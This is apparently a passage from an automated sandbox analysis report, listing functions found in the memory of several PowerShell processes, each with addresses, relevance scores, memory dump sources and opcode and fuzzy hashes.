                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B!I$(B!I$(B!I$(B!I$(B!I$X7W$
                                                                              • API String ID: 0-4054516502
                                                                              • Opcode ID: 1dd5b5ae78c1477e70da2eb3bcadee55d64036958fe496094a7e7fd0d81192be
                                                                              • Instruction ID: 282976d43647158bd3af05a8f6f43a8ac1670ecdfc7f41691f3f64c747f3af26
                                                                              • Opcode Fuzzy Hash: 1dd5b5ae78c1477e70da2eb3bcadee55d64036958fe496094a7e7fd0d81192be
                                                                              • Instruction Fuzzy Hash: 27D12231D0EA8A5FEB99EB2898155B5BBE1EF15350F1801BAD10ECB0D3EB1CAC05C795
                                                                              Function 00007FF848FD4073 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3361551889.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>!I
                                                                              • API String ID: 0-3115395871
                                                                              • Opcode ID: 49d650fbb8f4f157efff23f33e3a7bad0b86d18453663ea1d7866f321a2fadcb
                                                                              • Instruction ID: 8463c45c98cd6636666e5ae95dba5eaa40d1c1238d8c2f8296bee40e021b4346
                                                                              • Opcode Fuzzy Hash: 49d650fbb8f4f157efff23f33e3a7bad0b86d18453663ea1d7866f321a2fadcb
                                                                              • Instruction Fuzzy Hash: DB510332E0DA8A4FE79AEB2C541127577E2FF65660F1801BAC24FC71D2DF18E8058B49
                                                                              Function 00007FF848FD4370 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3361551889.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>!I
                                                                              • API String ID: 0-3876674509
                                                                              • Opcode ID: cca3ab521cabe9bc170262a10b29b863ebe7dc7b58bdace7931848bd08f10467
                                                                              • Instruction ID: 0874d866aa5f58078c23226415f4078c34abef6f4d43c90bedff66cece372adb
                                                                              • Opcode Fuzzy Hash: cca3ab521cabe9bc170262a10b29b863ebe7dc7b58bdace7931848bd08f10467
                                                                              • Instruction Fuzzy Hash: BD414B32E0DA494FE7A9EB2C64116B57BD1EF65760F0801BAC64FC71C3EB19AC118B85
                                                                              Function 00007FF848FD40BF Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3361551889.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>!I
                                                                              • API String ID: 0-3115395871
                                                                              • Opcode ID: 241fe691474056611804fcba7897f8160ce6dfe8a07109afe8921fb02f2a3a87
                                                                              • Instruction ID: feda8051f55f7f8e04d2b9c4b08c6e0dbda757d99a624f74f2b2aa00dbe69d25
                                                                              • Opcode Fuzzy Hash: 241fe691474056611804fcba7897f8160ce6dfe8a07109afe8921fb02f2a3a87
                                                                              • Instruction Fuzzy Hash: BB21F232D0DA864FE3AAEB2C585513466D2FF70690F4901B9C25FC71D2DF28DC048A49
                                                                              Function 00007FF848FD43BC Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3361551889.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848fd0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>!I
                                                                              • API String ID: 0-3876674509
                                                                              • Opcode ID: 8a7b46c3ae2c5bc98d70586052d71bb58693f5d2ca9a10a5c8a45b6544cb7fd4
                                                                              • Instruction ID: 579b9634b3f048cfa488ef0ea8c18bb49da70f75b40eaaedfc3f9b3f371b5062
                                                                              • Opcode Fuzzy Hash: 8a7b46c3ae2c5bc98d70586052d71bb58693f5d2ca9a10a5c8a45b6544cb7fd4
                                                                              • Instruction Fuzzy Hash: 70112532D0E6854FE3A4FB2C94545B87BD1FF616A0F4801BAC25EC71D3DB19AC608B85
                                                                              Function 00007FF848F09D28 Relevance: .2, Instructions: 220COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3346371756.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 601e8b2855b654a25ba7df9a05eef2637aaada4a7473308ead49634b8118d809
                                                                              • Instruction ID: 888c5df8ded12fd55fba1568bf9fad2054824b4ae0845ed5bd493977f129d640
                                                                              • Opcode Fuzzy Hash: 601e8b2855b654a25ba7df9a05eef2637aaada4a7473308ead49634b8118d809
                                                                              • Instruction Fuzzy Hash: 19F0893140C64CCFCB45EF1894595E87FE0FF65251F0501A7E40DC7061E7659D58CB81
                                                                              Function 00007FF848F0BDD0 Relevance: .2, Instructions: 164COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3346371756.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5eb307deb702033015b53b70d5a12918c1128fe96b0e06091cfd5815c8736314
                                                                              • Instruction ID: 322eca71a3a195356da1786d2ecc2378053b87257c045b4716acff3f8644516e
                                                                              • Opcode Fuzzy Hash: 5eb307deb702033015b53b70d5a12918c1128fe96b0e06091cfd5815c8736314
                                                                              • Instruction Fuzzy Hash: 9721067080D7888FDB1A8B689C496F97FB4EF53320F0481AFD085DB663C678580ACB61
                                                                              Function 00007FF848DEEB80 Relevance: .1, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3331619628.00007FF848DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DED000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848ded000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 14aa23fc4ce13099b8da00f6b0c574e91f82a19dbf7634d5c59dc0bedaabce94
                                                                              • Instruction ID: ebba1f5c4dc198f8854cb5379ed73adbecddd2552fb44e2371059ac3b78b4f8b
                                                                              • Opcode Fuzzy Hash: 14aa23fc4ce13099b8da00f6b0c574e91f82a19dbf7634d5c59dc0bedaabce94
                                                                              • Instruction Fuzzy Hash: BF41053180EFC44FE7569B289845A623FF0EF52364F1505EFD089CB1A3D729A84AC792
                                                                              Function 00007FF848F097A9 Relevance: .1, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3346371756.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 42759e778aa8f344acfe9bf1091ff86c47048e7b65f808b65979b61d0d13dc61
                                                                              • Instruction ID: 5dc17d894e38f2a4c05b16f31fa413efadc1b0b1980ddb2a2d40193202da788e
                                                                              • Opcode Fuzzy Hash: 42759e778aa8f344acfe9bf1091ff86c47048e7b65f808b65979b61d0d13dc61
                                                                              • Instruction Fuzzy Hash: 4831B33091CB4C8FDB18DB4CA8466A97BE0FB98721F00422FE449D3251DB70A855CBC6
                                                                              Function 00007FF848F033B5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3346371756.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                                                                              • Instruction ID: 7751a646eaf869edea33559e4a2383cdbafb38eb3a9baaa8760fd3dac5d19060
                                                                              • Opcode Fuzzy Hash: 9895435140380c782189f81496fffaa590a70fd196a779c416207eeb9efb34d6
                                                                              • Instruction Fuzzy Hash: DE01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3695DB36E882CB45

                                                                              Non-executed Functions

                                                                              Function 00007FF848F08BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3346371756.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: O_^6$O_^<$O_^F$O_^I$O_^J
                                                                              • API String ID: 0-2439779554
                                                                              • Opcode ID: 3e6fa0ed0c7a8285a811329c0b66aa8ae9f81e811c2ebc220639df73f97a5571
                                                                              • Instruction ID: fa931550e445a7466d55b1b6f31d0eb6f76c04c78d384d1295deffb948580016
                                                                              • Opcode Fuzzy Hash: 3e6fa0ed0c7a8285a811329c0b66aa8ae9f81e811c2ebc220639df73f97a5571
                                                                              • Instruction Fuzzy Hash: EA21297B72A416AED20177ADBC005D97390DBD42BB74846B3D25DCF603DE18648B46A8

                                                                              Executed Functions

                                                                              Function 00007FF848FE660A Relevance: 7.9, Strings: 6, Instructions: 412COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3521263013.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B#I$(B#I$(B#I$(B#I$(B#I$X7_
                                                                              • API String ID: 0-3815718480
                                                                              • Opcode ID: 6409279b196e8a669f12ac548bc2fa85461a5d1b6f1f38f459f36012da0808e3
                                                                              • Instruction ID: 54fff735d87186cfd22cf31c39ba94429b0a7b1920a7719c1b08a65c15877830
                                                                              • Opcode Fuzzy Hash: 6409279b196e8a669f12ac548bc2fa85461a5d1b6f1f38f459f36012da0808e3
                                                                              • Instruction Fuzzy Hash: 37C11131D1EA8E9FEBA9EB2898545B5BBA1EF15390F1401BAD40DCB0D3EB1CA805C355
                                                                              Function 00007FF848FE662B Relevance: 6.5, Strings: 5, Instructions: 261COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3521263013.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B#I$(B#I$(B#I$(B#I$X7_
                                                                              • API String ID: 0-4196163103
                                                                              • Opcode ID: 3b8482fdb7d8055f5906bb9dd66ad01c0adcf824f0e1284252703affefea3b89
                                                                              • Instruction ID: 281974d39536a6e5e69d900f66748a9234f18999776fa6650109342a4433c3b3
                                                                              • Opcode Fuzzy Hash: 3b8482fdb7d8055f5906bb9dd66ad01c0adcf824f0e1284252703affefea3b89
                                                                              • Instruction Fuzzy Hash: 1681F171D1EA8E8FE7AAEB2858645747BA1EF15790F1900FAD40DCB0D3EA1CAC05C355
                                                                              Function 00007FF848FE4073 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3521263013.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>#I
                                                                              • API String ID: 0-2340899229
                                                                              • Opcode ID: 28b44ba4481076975299eb61e3cf2d7e3f45316a9f42d8fbcc524157b7c9484e
                                                                              • Instruction ID: ccecbd7d68f109b8b1d0b9ad53d652c4c1d7efb3c022c0d95da6b403473c0f1a
                                                                              • Opcode Fuzzy Hash: 28b44ba4481076975299eb61e3cf2d7e3f45316a9f42d8fbcc524157b7c9484e
                                                                              • Instruction Fuzzy Hash: A351B232A0DE8A4FEB9AAB2C941167577D2FFA5660F5801BEC14EC71D2DE1CE8058249
                                                                              Function 00007FF848FE4370 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3521263013.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>#I
                                                                              • API String ID: 0-3576117583
                                                                              • Opcode ID: d25f2258ec0e982b7ac4f2adc0999589f2e48f2a19702ea0a2aa5d056939852c
                                                                              • Instruction ID: 1eb64e07844be2ab5fe99ae7be50bb6f91f8d2976cde567290cc41a6828b30f3
                                                                              • Opcode Fuzzy Hash: d25f2258ec0e982b7ac4f2adc0999589f2e48f2a19702ea0a2aa5d056939852c
                                                                              • Instruction Fuzzy Hash: 38410332E0DE494FE7A9EB2864116B57BE1EF64660F0801BEC54EC75C7EB1CAC118395
                                                                              Function 00007FF848FE40BF Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3521263013.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>#I
                                                                              • API String ID: 0-2340899229
                                                                              • Opcode ID: e8a7af6405c19bd4ff64ffc92bef1411f0b764b60da1c2da0abeafb905badaab
                                                                              • Instruction ID: 9ce6a0af70269b8d400e3e01e0dd14b6ac667ba9a943d92f4ed8af87854f0b8e
                                                                              • Opcode Fuzzy Hash: e8a7af6405c19bd4ff64ffc92bef1411f0b764b60da1c2da0abeafb905badaab
                                                                              • Instruction Fuzzy Hash: A521AE32D0DE864FEBAAEB28985117466D2FF74690F5901BEC10EC71E2DF2CDC058249
                                                                              Function 00007FF848FE43BC Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3521263013.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>#I
                                                                              • API String ID: 0-3576117583
                                                                              • Opcode ID: abe9c4d0b4de5c7ea39dc74bc24224594c5c9e658833a0b22fad3a52a0161bc5
                                                                              • Instruction ID: aa3c771c08f87c77ec571f5b69374a2f4c7ac74aff7df83f1862d5067c6a0b11
                                                                              • Opcode Fuzzy Hash: abe9c4d0b4de5c7ea39dc74bc24224594c5c9e658833a0b22fad3a52a0161bc5
                                                                              • Instruction Fuzzy Hash: C911C232E0EE854FE7A4EB2898545B87BD1FF606A0F4901BED45DC75D2DB1CAC108395
                                                                              Function 00007FF848F19718 Relevance: .2, Instructions: 162COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3508029804.00007FF848F19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F19000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848f19000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ee5cce01cc2a295dd5ee5dd414013f1085e850c41046201e92f60ee05e138a14
                                                                              • Instruction ID: 26f890c30b166fe5e3613732308e11e0515f01868008164c807fad9087e49b57
                                                                              • Opcode Fuzzy Hash: ee5cce01cc2a295dd5ee5dd414013f1085e850c41046201e92f60ee05e138a14
                                                                              • Instruction Fuzzy Hash: 71411931E0DB888FEB199B5CAC062A8BFE0FF55710F14416FD04983697DA24AC16C7C6
                                                                              Function 00007FF848DFEF00 Relevance: .1, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3491411641.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848dfd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 434e9856fddfe208335649fc885a05552d004fa5e68f034a61f0e8a62fa588f4
                                                                              • Instruction ID: 6c35361bd1b101fb392d61c47e139e1d0e2783407a1b3d786d3e210291a3744c
                                                                              • Opcode Fuzzy Hash: 434e9856fddfe208335649fc885a05552d004fa5e68f034a61f0e8a62fa588f4
                                                                              • Instruction Fuzzy Hash: 0641F67180EBC44FE7569B289855A523FF0EF57360B1901DFD088CF1A3DB29A849C7A2
                                                                              Function 00007FF848F1A49C Relevance: .1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3508029804.00007FF848F19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F19000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848f19000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7762807eba827280ac39d0ada6c492c08f7411623467fd664907e5e32aeb4578
                                                                              • Instruction ID: 32189c2535a0711474767dc386426b2fa338b0be60490a40624ddfa9b042d934
                                                                              • Opcode Fuzzy Hash: 7762807eba827280ac39d0ada6c492c08f7411623467fd664907e5e32aeb4578
                                                                              • Instruction Fuzzy Hash: A221F83190CB4C4FDB59DFAC984A7E97FF0EB96321F04426BD049C3152D674A856CB91
                                                                              Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3508029804.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                              Function 00007FF848F19CF8 Relevance: .0, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000019.00000002.3508029804.00007FF848F19000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F19000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_25_2_7ff848f19000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8189bca01d9cbfae4054be8bc405492882ff7137a649e5acf925b01677257558
                                                                              • Instruction ID: 5eb059ed6d9443675e2291c9f651cf90a7b5e64ba2f5f772542ad1c08717d1e8
                                                                              • Opcode Fuzzy Hash: 8189bca01d9cbfae4054be8bc405492882ff7137a649e5acf925b01677257558
                                                                              • Instruction Fuzzy Hash: C3F0B43180C6894FDB46EF2888595D57FA0EF26350F0402DBE458C70A2DB659858CBC2

                                                                              Executed Functions

                                                                              Function 00007FF848FE6605 Relevance: 6.7, Strings: 5, Instructions: 424COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3526822055.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B"I$(B"I$(B"I$(B"I$(B"I
                                                                              • API String ID: 0-3570690463
                                                                              • Opcode ID: bcea4c062d3514bc09edd6f1fe4d7a6374e472a7472543c6e86ed2d18127213b
                                                                              • Instruction ID: 42b226be6ee267e7ef9ebfbe4e79b112cf9b02abb5805e35601213bc34bb9e01
                                                                              • Opcode Fuzzy Hash: bcea4c062d3514bc09edd6f1fe4d7a6374e472a7472543c6e86ed2d18127213b
                                                                              • Instruction Fuzzy Hash: 6FC12031D1EA8E5FEB99EB2858595B5BBA1EF16390F1801BAD00DCB0D3EB1CAC05C355
                                                                              Function 00007FF848FE425A Relevance: 2.8, Strings: 2, Instructions: 346COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3526822055.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>"I$p>"I
                                                                              • API String ID: 0-799128563
                                                                              • Opcode ID: 9cae2b46445b4055dcec17614ae5e729c06b50de31d8d66197379ef38fa142c7
                                                                              • Instruction ID: cf3b15c0897296d7aac0e8201fd4768f92173da492c893eff2cb546da7b4a6d4
                                                                              • Opcode Fuzzy Hash: 9cae2b46445b4055dcec17614ae5e729c06b50de31d8d66197379ef38fa142c7
                                                                              • Instruction Fuzzy Hash: 02A1D131D0EB894FE356AB2858155B47FE1EF66660F0901FFD049C75D3DA1CAC0683A6
                                                                              Function 00007FF848FE4073 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3526822055.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>"I
                                                                              • API String ID: 0-2459728092
                                                                              • Opcode ID: 73421701cb81669992a1a6f4e3a4baecdfa4fbd61e492d462af324eaaeedc611
                                                                              • Instruction ID: be234d45479558eba07d6329544202813222e02519685b8fc61e69121db0fdd3
                                                                              • Opcode Fuzzy Hash: 73421701cb81669992a1a6f4e3a4baecdfa4fbd61e492d462af324eaaeedc611
                                                                              • Instruction Fuzzy Hash: 6751B232A0DE8A4FEB9AAB2C941167577D2FFA5660F1801BEC14EC71D2DE1CE8058249
                                                                              Function 00007FF848FE40BF Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3526822055.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>"I
                                                                              • API String ID: 0-2459728092
                                                                              • Opcode ID: 7969db6cf47d84f51a7c898a661b3296e790229f9c6280c56235a245b412618c
                                                                              • Instruction ID: f03e99d224511df892dee4f9a6f6af105b874f23fe69bc7ac8e4758f6e162e19
                                                                              • Opcode Fuzzy Hash: 7969db6cf47d84f51a7c898a661b3296e790229f9c6280c56235a245b412618c
                                                                              • Instruction Fuzzy Hash: 3121AE32D0DE864FEBAAEB28985117466D2FF74690F5901BEC11EC71E2DF2C9C058249
                                                                              Function 00007FF848FE6806 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3526822055.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B"I
                                                                              • API String ID: 0-2674835063
                                                                              • Opcode ID: 6bf5c24a6799f2f08e57c24f2156c3d88e80ac5363637b477c825d1577f19e23
                                                                              • Instruction ID: 1097000a34ff9b65544b8a9e8eb4edaae00d887a86722c6e7066d0159ec63732
                                                                              • Opcode Fuzzy Hash: 6bf5c24a6799f2f08e57c24f2156c3d88e80ac5363637b477c825d1577f19e23
                                                                              • Instruction Fuzzy Hash: 25110431E0D68E8FE768EB589494278B791EF08351F2400BEC14DC70C3EA1C5845C354
                                                                              Function 00007FF848FE43BC Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3526822055.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>"I
                                                                              • API String ID: 0-3426486286
                                                                              • Opcode ID: 40467b8501a7ea4b8d8fd09580b8a5e2b679a20df38465778c36a6495b1507c3
                                                                              • Instruction ID: 7cde23068cec17c799365b944c5d4e82cc2bbf75b2ff58024c539e9da85b4420
                                                                              • Opcode Fuzzy Hash: 40467b8501a7ea4b8d8fd09580b8a5e2b679a20df38465778c36a6495b1507c3
                                                                              • Instruction Fuzzy Hash: E811C232E0EA854FE7A4EB2898545B87BD1FF606A0F4901BED45DC75D2DB1CAC108395
                                                                              Function 00007FF848F1BC4A Relevance: .7, Instructions: 668COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3513772351.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5807d6b623a33f731891364b5aafb2764b259900c623b3ac2882996174f7e889
                                                                              • Instruction ID: 9097b4b9793bcea1c83715238c74c7da57b1896e93a0d69069a08f80fe8284cd
                                                                              • Opcode Fuzzy Hash: 5807d6b623a33f731891364b5aafb2764b259900c623b3ac2882996174f7e889
                                                                              • Instruction Fuzzy Hash: 2722B531A1CA498FDB88EF1CC495AA9B7E1FF58350F14416DD44AD7296DB35EC42CB80
                                                                              Function 00007FF848F19728 Relevance: .2, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3513772351.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
